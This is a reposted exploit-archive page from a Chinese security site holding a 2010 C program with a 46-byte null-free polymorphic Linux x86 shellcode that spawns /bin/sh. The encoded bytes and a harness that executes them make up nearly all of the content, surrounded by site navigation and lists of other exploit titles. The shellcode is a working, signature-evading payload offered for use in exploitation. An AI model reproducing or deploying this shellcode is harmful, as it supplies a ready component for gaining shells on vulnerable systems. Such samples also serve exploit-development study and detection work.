首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
linux/x86 /bin/sh Null-Free Polymorphic Shellcode - 46 bytes
来源:Aodrulez@blogspot.com 作者:Aodrulez 发布时间:2010-08-23  
#include <stdio.h>
#include <string.h>

/*
Aodrulez's /bin/sh Null-Free Polymorphic Shellcode.
Shellcode size : 46 bytes.
[Special Tnx to 'Chema Garcia (aka sch3m4)']
Tested on : Ubuntu 8.04,Hardy Heron.
Email : f3arm3d3ar[at]gmail.com
Author: Aodrulez. (Atul Alex Cherian)
Blog  : Aodrulez@blogspot.com
*/


char code[] = "\xeb\x12\x31\xc9\x5e\x56\x5f\xb1\x15\x8a\x06\xfe\xc8\x88\x06\x46\xe2"
          "\xf7\xff\xe7\xe8\xe9\xff\xff\xff\x32\xc1\x32\xca\x52\x69\x30\x74\x69"
          "\x01\x69\x30\x63\x6a\x6f\x8a\xe4\xb1\x0c\xce\x81";

int main(int argc, char **argv)
{
    fprintf(stdout,"Aodrulez's Linux Polym0rphic Shellc0de.\nShellcode Size: %d bytes.\n",strlen(code));
        (*(void(*)()) code)();
return 0;

}


/*
Greetz Fly Out to:-
1] Amforked()    : My Mentor.
2] TheBlueGenius : My Boss ;-)
3] www.orchidseven.com
4] www.isac.org.in
5] www.Malcon.org -> World's first Malware Conference!
*/


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SonciWALL Aventail epi.dll Aut
·linux/x86 /etc/init.d shellcod
·Microsoft Windows (IcmpSendEch
·os-x/x86 intel - execve(/bin/s
·PlayPad Music Player v1.12 .mp
·ECShop v2.6.1 (FCKeditor Remot
·AV Music Morpher Gold 5.0.38 (
·ECShop v2.7.2 (FCKeditor Remot
·Windows XP SP3 English Message
·UblogReload 1.0.5 Database Dis
·Karaoke Video Creator Denial o
·Video Script ASP Database Disc
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved